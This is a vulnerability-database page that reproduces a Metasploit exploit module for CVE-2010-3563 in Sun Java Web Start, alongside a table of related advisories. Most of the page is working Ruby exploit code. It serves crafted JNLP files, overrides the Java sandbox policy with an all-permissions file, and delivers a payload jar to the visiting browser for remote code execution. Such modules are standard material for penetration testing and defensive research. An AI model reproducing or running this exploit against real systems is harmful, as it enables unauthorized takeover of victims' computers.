Vulners
Lucene search
Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 51 |
|---|---|---|---|---|
 | CVE-2010-3563 | 22 Jan 201100:00 | – | circl |
 | Sun Java Web Start BasicServiceImpl Remote Code Execution (CVE-2010-3563) | 15 Nov 201100:00 | – | checkpoint_advisories |
 | CVE-2010-3563 | 19 Oct 201021:00 | – | cve |
 | CVE-2010-3563 | 19 Oct 201021:00 | – | cvelist |
 | DSquare Exploit Pack: D2SEC_JAVAWS3 | 19 Oct 201022:00 | – | d2 |
 | Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit) | 22 Jan 201100:00 | – | exploitdb |
 | GLSA-201111-02 : Oracle JRE/JDK: Multiple vulnerabilities (BEAST) | 7 Nov 201100:00 | – | nessus |
| Oracle Java SE Multiple Vulnerabilities (October 2010 CPU) | 15 Oct 201000:00 | – | nessus |
| Oracle Java SE Multiple Vulnerabilities (October 2010 CPU) (Unix) | 22 Feb 201300:00 | – | nessus |
| RHEL 4 / 5 : java-1.6.0-sun (RHSA-2010:0770) | 15 Oct 201000:00 | – | nessus |
10
`##
# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
# Internet explorer freaks out and shows the scary yellow info bar if this
# is in an iframe. The exploit itself also creates a couple of scary popup
# windows about "downloading application" that I haven't been able to
# figure out how to prevent. For both of these reasons, don't include it
# in Browser Autopwn.
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit',
'Description' => %q{
This module exploits a vulnerability in Java Runtime Environment
that allows an attacker to escape the Java Sandbox. By injecting
a parameter into a javaws call within the BasicServiceImpl class
the default java sandbox policy file can be therefore overwritten.
The vulnerability affects version 6 prior to update 22.
NOTE: Exploiting this vulnerability causes several sinister-looking
popup windows saying that Java is "Downloading application."
},
'License' => MSF_LICENSE,
'Author' => [
'Matthias Kaiser', # Discovery, PoC, metasploit module
'egypt' # metasploit module
],
'Version' => '$Revision: 10488 $',
'References' =>
[
[ 'CVE', '2010-3563' ],
[ 'OSVDB', '69043' ],
[ 'URL', 'http://mk41ser.blogspot.com' ],
],
'Platform' => [ 'java', 'win' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Windows x86',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java',
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 12 2010'
))
end
def on_request_uri( cli, request )
jpath = get_uri
case request.uri
when /java.security.policy/
print_status("Checking with HEAD")
ack = "OK"
send_response(cli, ack, { 'Content-Type' => 'application/x-java-jnlp-file' })
when /all.policy/
all = "grant {permission java.security.AllPermission;};\n"
print_status("Sending all.policy")
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
when /init.jnlp/
init = %Q|<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/init.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="BasicServiceExploit">
<argument>#{jpath}</argument>
</application-desc>
</jnlp>
|
print_status("Sending init.jnlp")
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
when /exploit.jnlp/
expl = %Q|<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/exploit.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="Exploit"/>
</jnlp>
|
print_status("Sending exploit.jnlp")
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
when /\.jar$/i
p = regenerate_payload(cli)
paths = [
[ "BasicServiceExploit.class" ],
[ "Exploit.class" ],
]
dir = [ Msf::Config.data_directory, "exploits", "cve-2010-3563" ]
jar = p.encoded_jar
jar.add_files(paths, dir)
print_status("Sending Jar file to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
handler(cli)
else
print_status("Sending redirect to init.jnlp")
send_redirect(cli, get_resource() + '/init.jnlp', '')
end
end
def jnlp_info
%Q|<information>
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
<java version="1.6+"/>
<jar href="#{get_uri}/exploit.jar"/>
</resources>
|
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Nov 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.88762